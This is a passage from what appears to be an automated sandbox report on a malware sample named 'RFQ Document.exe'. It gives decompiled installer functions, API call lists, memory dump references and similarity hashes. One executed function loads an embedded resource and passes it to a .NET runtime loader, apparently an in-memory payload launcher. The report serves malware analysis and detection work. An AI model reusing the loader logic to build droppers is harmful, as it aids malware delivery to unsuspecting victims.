					_t6 =  *0x420c48; // 0x0
					if(_t6 != 0) {
						_t6 = DestroyWindow(_t6);
					}
					 *0x420c48 = 0;
					return _t6;
				}
			}

0x00402bf8
0x00402c12
0x00402c18
0x00402c22
0x00402c28
0x00402c2e
0x00402c3f
0x00402c48
0x00000000
0x00402c4d
0x00402c54
0x00402c1a
0x00402c21
0x00402c21
0x00402bfa
0x00402bfa
0x00402c01
0x00402c04
0x00402c04
0x00402c0a
0x00402c11
0x00402c11

APIs

DestroyWindow.USER32(00000000,00000000,00402DD1,00000001), ref: 00402C04
GetTickCount.KERNEL32 ref: 00402C22
CreateDialogParamA.USER32(0000006F,00000000,00402B6E,00000000), ref: 00402C3F
ShowWindow.USER32(00000000,00000005), ref: 00402C4D

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
Instruction ID: af7afb5c67b035eb61978086e86d3b64d4827bf2199b448f7584534e2ab44da5
Opcode Fuzzy Hash: 314feb9a6f5b037bccdbcd606c1efed59a9f25e3e49878e5389ae12efd8f53aa
Instruction Fuzzy Hash: 46F0E270A0D260ABC3746F66FE8C98F7BA4F744B017400876F104B11E9CA7858C68B9D

Uniqueness

Uniqueness Score: -1.00%

Function 00404E03, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 58
windowCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				long _t22;

				if(_a8 != 0x102) {
					if(_a8 != 0x200) {
						_t22 = _a16;
						L7:
						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
							 *0x42a088 = _t22;
							E00405BC7(0x42a0a0, 0x42f000);
							E00405B25(0x42f000, _t22);
							E0040140B(6);
							E00405BC7(0x42f000, 0x42a0a0);
						}
						L11:
						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t22 = _a16;
						goto L11;
					}
					_t22 = E00404782(_a4, 1);
					_a8 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00403ECF(0x413);
				return 0;
			}

0x00404e0f
0x00404e34
0x00404e54
0x00404e57
0x00404e5a
0x00404e71
0x00404e77
0x00404e7e
0x00404e85
0x00404e8c
0x00404e91
0x00404e97
0x00000000
0x00404ea7
0x00404e41
0x00404e94
0x00404e94
0x00000000
0x00404e94
0x00404e4d
0x00404e4f
0x00000000
0x00404e4f
0x00404e15
0x00000000
0x00000000
0x00404e1c
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 00404E39
CallWindowProcA.USER32 ref: 00404EA7

Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1

Strings

, xrefs: 00404E11

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE

Uniqueness

Uniqueness Score: -1.00%

Function 004024F1, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
filestringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
				int _t5;
				long _t7;
				struct _OVERLAPPED* _t11;
				intOrPtr* _t15;
				void* _t17;
				int _t21;

				_t15 = __esi;
				_t11 = __ebx;
				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
					_t7 = lstrlenA(E00402A29(0x11));
				} else {
					E00402A0C(1);
					 *0x40a040 = __al;
				}
				if( *_t15 == _t11) {
					L8:
					 *((intOrPtr*)(_t17 - 4)) = 1;
				} else {
					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\jones\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll", _t7, _t17 + 8, _t11);
					_t21 = _t5;
					if(_t21 == 0) {
						goto L8;
					}
				}
				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
				return 0;
			}

0x004024f1
0x004024f1
0x004024f4
0x0040250f
0x004024f6
0x004024f8
0x004024fd
0x00402504
0x00402516
0x0040268f
0x0040268f
0x0040251c
0x0040252e
0x004015a6
0x004015a8
0x00000000
0x004015ae
0x004015a8
0x004028c1
0x004028cd

APIs

lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll,00000000,?,?,00000000,00000011), ref: 0040252E

Strings

C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll, xrefs: 004024FD, 00402522

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWritelstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsf2EF6.tmp\tkwj.dll
API String ID: 427699356-1569363024
Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E

Uniqueness

Uniqueness Score: -1.00%

Function 00404F85, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32
comCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00404F85(signed int __eax) {
				intOrPtr _v0;
				intOrPtr _t8;
				intOrPtr _t10;
				intOrPtr _t11;
				intOrPtr* _t12;

				_t11 =  *0x42ec48; // 0x765174
				_t10 =  *0x42ec4c; // 0x3
				__imp__OleInitialize(0);
				 *0x42ecd8 =  *0x42ecd8 | __eax;
				E00403ECF(0);
				if(_t10 != 0) {
					_t12 = _t11 + 0xc;
					do {
						_t10 = _t10 - 1;
						if(( *(_t12 - 4) & 0x00000001) == 0) {
							goto L4;
						} else {
							_push(_v0);
							if(E00401389( *_t12) != 0) {
								 *0x42ecac =  *0x42ecac + 1;
							} else {
								goto L4;
							}
						}
						goto L7;
						L4:
						_t12 = _t12 + 0x418;
					} while (_t10 != 0);
				}
				L7:
				E00403ECF(0x404);
				__imp__OleUninitialize();
				_t8 =  *0x42ecac; // 0x0
				return _t8;
			}

0x00404f86
0x00404f8d
0x00404f95
0x00404f9b
0x00404fa3
0x00404faa
0x00404fac
0x00404faf
0x00404faf
0x00404fb4
0x00000000
0x00404fb6
0x00404fb6
0x00404fc3
0x00404fd1
0x00000000
0x00000000
0x00000000
0x00404fc3
0x00000000
0x00404fc5
0x00404fc5
0x00404fcb
0x00404fcf
0x00404fd7
0x00404fdc
0x00404fe1
0x00404fe7
0x00404fee

APIs

OleInitialize.OLE32(00000000), ref: 00404F95

Part of subcall function 00403ECF: SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 00403EE1

OleUninitialize.OLE32(00000404,00000000), ref: 00404FE1

Strings

tQv, xrefs: 00404F86

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: InitializeMessageSendUninitialize
String ID: tQv
API String ID: 2896919175-3061817730
Opcode ID: 30ab11e00dbeb51ca236c749d8926ec7d9dd09e205587ca33223078b0ea66fd0
Instruction ID: 3412b2758c046384b18635310f82fde34dc1c24163575810483935c249b0902b
Opcode Fuzzy Hash: 30ab11e00dbeb51ca236c749d8926ec7d9dd09e205587ca33223078b0ea66fd0
Instruction Fuzzy Hash: 70F0B4B36082019AE7116B96DD01B5A77A59FD0711F05403BFF44B23E0DB795842876D

Uniqueness

Uniqueness Score: -1.00%

Function 00405427, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 24
processCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405427(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x42c0a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}

0x00405430
0x0040544c
0x00405454
0x00405459
0x00000000
0x0040545f
0x00405463

APIs

CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
CloseHandle.KERNEL32(?), ref: 00405459

Strings

Error launching installer, xrefs: 0040543A

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseCreateHandleProcess
String ID: Error launching installer
API String ID: 3712363035-66219284
Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00403585, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403585() {
				void* _t2;
				void* _t3;
				void* _t6;
				void* _t8;

				_t8 =  *0x42905c;
				_t3 = E0040356A(_t2, 0);
				if(_t8 != 0) {
					do {
						_t6 = _t8;
						_t8 =  *_t8;
						FreeLibrary( *(_t6 + 8));
						_t3 = GlobalFree(_t6);
					} while (_t8 != 0);
				}
				 *0x42905c =  *0x42905c & 0x00000000;
				return _t3;
			}

0x00403586
0x0040358e
0x00403595
0x00403598
0x00403598
0x0040359a
0x0040359f
0x004035a6
0x004035ac
0x004035b0
0x004035b1
0x004035b9

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
GlobalFree.KERNEL32 ref: 004035A6

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403597

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-3081826266
Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8

Uniqueness

Uniqueness Score: -1.00%

Function 00405701, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405701(char* _a4) {
				char* _t3;
				char* _t5;

				_t5 = _a4;
				_t3 =  &(_t5[lstrlenA(_t5)]);
				while( *_t3 != 0x5c) {
					_t3 = CharPrevA(_t5, _t3);
					if(_t3 > _t5) {
						continue;
					}
					break;
				}
				 *_t3 =  *_t3 & 0x00000000;
				return  &(_t3[1]);
			}

0x00405702
0x0040570c
0x0040570e
0x00405715
0x0040571d
0x00000000
0x00000000
0x00000000
0x0040571d
0x0040571f
0x00405724

APIs

lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ Document.exe,C:\Users\user\Desktop\RFQ Document.exe,80000000,00000003), ref: 00405707
CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\RFQ Document.exe,C:\Users\user\Desktop\RFQ Document.exe,80000000,00000003), ref: 00405715

Strings

C:\Users\user\Desktop, xrefs: 00405701

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-224404859
Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD

Uniqueness

Uniqueness Score: -1.00%

Function 00405813, Relevance: 5.0, APIs: 4, Instructions: 30
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405813(CHAR* _a4, CHAR* _a8) {
				int _t10;
				int _t15;
				CHAR* _t16;

				_t15 = lstrlenA(_a8);
				_t16 = _a4;
				while(lstrlenA(_t16) >= _t15) {
					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
					_t10 = lstrcmpiA(_t16, _a8);
					if(_t10 == 0) {
						return _t16;
					}
					_t16 = CharNextA(_t16);
				}
				return 0;
			}

0x0040581f
0x00405821
0x00405849
0x0040582e
0x00405833
0x0040583e
0x00000000
0x0040585b
0x00405847
0x00405847
0x00000000

APIs

lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A

Memory Dump Source

Source File: 00000001.00000002.672287189.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.672282003.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672311352.0000000000407000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.672319179.0000000000409000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672348667.000000000042C000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672358693.0000000000434000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.672378058.0000000000437000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RFQ Document.exe PID: 6484 Parent PID: 2628 RFQ Document.exeCOMMON

Executed Functions

Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}

0x0040149f
0x004014a5
0x004014a9
0x004014ec
0x004014ee
0x004014ee
0x004014b7
0x004014bb
0x004014c7
0x004014cd
0x004014d3
0x004014d8
0x004014e0
0x004014e0
0x004014d8
0x004014e6
0x00000000

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD

Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037

FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
ExitProcess.KERNEL32 ref: 004014EE

Strings

v4.0.30319, xrefs: 00401053

Memory Dump Source

Source File: 00000002.00000002.925923176.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
String ID: v4.0.30319
API String ID: 2372384083-3152434051
Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679

Uniqueness

Uniqueness Score: -1.00%

Function 0234CD60, Relevance: 1.8, APIs: 1, Instructions: 273COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0234CE3C

Memory Dump Source

Source File: 00000002.00000002.926566952.0000000002340000.00000040.00000001.sdmp, Offset: 02340000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: fc547c99fbbe48c66cf23c3019351c93f260d19d4684386bf419b8944905e03b
Instruction ID: a83e1f7b419242a5afac75cf102d71aaa8ddaf79c69855818537466ea0731f30
Opcode Fuzzy Hash: fc547c99fbbe48c66cf23c3019351c93f260d19d4684386bf419b8944905e03b
Instruction Fuzzy Hash: 79D19F74E01218CFDB54DFA5D954B9DBBB2EB88304F2081A9D809AB369DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05974588, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05974654

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 7a3f774c3a646510dc644bb1ad0983c274a092ebca0c4767655d9f4a0521a32a
Instruction ID: 767473add75235dbc3533a16a112fd4045ca747ac42b76078a4f411e28cf7982
Opcode Fuzzy Hash: 7a3f774c3a646510dc644bb1ad0983c274a092ebca0c4767655d9f4a0521a32a
Instruction Fuzzy Hash: 38C1A174E00218CFDB64DFA5C944B9DBBB2BF89304F2481AAD809AB355DB356E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 05973CB0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05973D7B

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a8fdec9c24bb7ec07edbc10c0d081d464fce4e2bd6c5b0fc3c4b848879fedbcd
Instruction ID: aad502103d471e0dca60d31a3c2fbdf3a4c7075d18e067760dc5b39d1eee4d87
Opcode Fuzzy Hash: a8fdec9c24bb7ec07edbc10c0d081d464fce4e2bd6c5b0fc3c4b848879fedbcd
Instruction Fuzzy Hash: 41C19F74E00218CFDB64DFA5C954B9DBBB2BF88304F2085AAD809AB355DB356E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05973400, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059734CB

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 63443f7fccacb61bb8489c9eb8c38da4fe34e25afb1c09dda6139a942e7a8f08
Instruction ID: 07a451d842a50d053155f968291ff66f8a47cd7515f86a41d735342c7a42e6a3
Opcode Fuzzy Hash: 63443f7fccacb61bb8489c9eb8c38da4fe34e25afb1c09dda6139a942e7a8f08
Instruction Fuzzy Hash: F6C1A074E00218CFDB64DFA5C954B9DBBB2BF88304F2485AAD809AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05975F98, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05976063

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 0117d2fb5b69b53cf32d246a3464a70a88af2acac048bfdabbc27af23283fd52
Instruction ID: e6b66fc007bd17197f4b7b11b47788f4b84ba5737bfdfa69c0983a452cb80c87
Opcode Fuzzy Hash: 0117d2fb5b69b53cf32d246a3464a70a88af2acac048bfdabbc27af23283fd52
Instruction Fuzzy Hash: 07C19F74E00218CFDB64DFA5C954B9DBBB2EF89304F2081AAD809AB355DB355E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 05972FA8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05973073

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: a3dcee2bb782da83bcd4cd3515f89d4094dd11257b34a539ce3b924eef665774
Instruction ID: 79e1835e15a7421ea52665b60379ea2e77bbc46b00bf1a15dd1b9ab80c7b44c2
Opcode Fuzzy Hash: a3dcee2bb782da83bcd4cd3515f89d4094dd11257b34a539ce3b924eef665774
Instruction Fuzzy Hash: 34C1AE74E00218CFDB64DFA5C954B9DBBB2EF88304F2085AAD809AB355DB356E85CF11

Uniqueness

Uniqueness Score: -1.00%

Function 059726D0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 0597279B

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: 4f4c4ae7a78bc0fa352ee5a024438ee586b7c7f51f70b7eddb283a7555e06595
Instruction ID: 8a13bd224fa1e6f42b5d681585b3b2e7ea3037133516e25808f916eab44242bd
Opcode Fuzzy Hash: 4f4c4ae7a78bc0fa352ee5a024438ee586b7c7f51f70b7eddb283a7555e06595
Instruction Fuzzy Hash: AAC1A074E00218CFDB64DFA5C944B9DBBB2BF88304F2481AAD809AB355DB356E85CF10

Uniqueness

Uniqueness Score: -1.00%

Function 059756E8, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 059757B3

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: cae5690af0c2827ffb31242315b3a271e985a6f32ec516c89d9a3f01b79fb4f1
Instruction ID: b896b298a342ad8172928419eda7ef25ebdadd4ac0a7ee3a9b1cd38ca34b3b48
Opcode Fuzzy Hash: cae5690af0c2827ffb31242315b3a271e985a6f32ec516c89d9a3f01b79fb4f1
Instruction Fuzzy Hash: 0CC1B074E00218CFDB64DFA5C984B9DBBB2BF88304F2081AAD809AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 05974E38, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05974F03

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

API ID: DispatcherExceptionUser
String ID:
API String ID: 6842923-0
Opcode ID: df5008979673d2c768ed0652ada4654b2efc0b78052895f57d72beac30ce4ad8
Instruction ID: 1d5367a8090a719fada5dd497d0521158f12b0ff4f3141a638223c16bbb2234c
Opcode Fuzzy Hash: df5008979673d2c768ed0652ada4654b2efc0b78052895f57d72beac30ce4ad8
Instruction Fuzzy Hash: 19C1A174E00218CFDB64DFA5C994B9DBBB2BF89304F2081AAD809AB355DB355E85CF50

Uniqueness

Uniqueness Score: -1.00%

Function 059749E0, Relevance: 1.8, APIs: 1, Instructions: 268COMMON

Download Yara Rule

APIs

KiUserExceptionDispatcher.NTDLL ref: 05974AAB

Memory Dump Source

Source File: 00000002.00000002.928840149.0000000005970000.00000040.00000001.sdmp, Offset: 05970000, based on PE: false

Similarity

